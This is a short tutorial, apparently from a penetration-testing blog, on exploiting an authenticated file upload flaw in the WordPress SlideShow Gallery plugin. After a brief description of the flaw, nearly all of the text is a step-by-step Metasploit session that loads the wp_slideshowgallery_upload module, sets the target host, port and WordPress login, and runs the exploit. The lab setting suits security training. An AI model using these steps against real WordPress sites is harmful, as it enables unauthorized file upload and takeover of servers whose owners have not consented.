Exploit WordPress using SlideShow Gallery Authenticated File Upload

The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An authenticated attacker can upload arbitrary files to the upload folder. Because the plugin uses its own file upload mechanism instead of the WordPress API, it is possible to upload any file type.

Exploit Targets

WordPress

Requirement

Attacker: Kali Linux

Victim PC: WordPress

Open a Kali terminal and type msfconsole

Now type use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit (wp_slideshowgallery_upload) > set targeturi /

msf exploit (wp_slideshowgallery_upload) > set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (wp_slideshowgallery_upload) > set rport 80

msf exploit (wp_slideshowgallery_upload) > set wp_user user

msf exploit (wp_slideshowgallery_upload) > set wp_password bitnami

msf exploit (wp_slideshowgallery_upload) > exploit
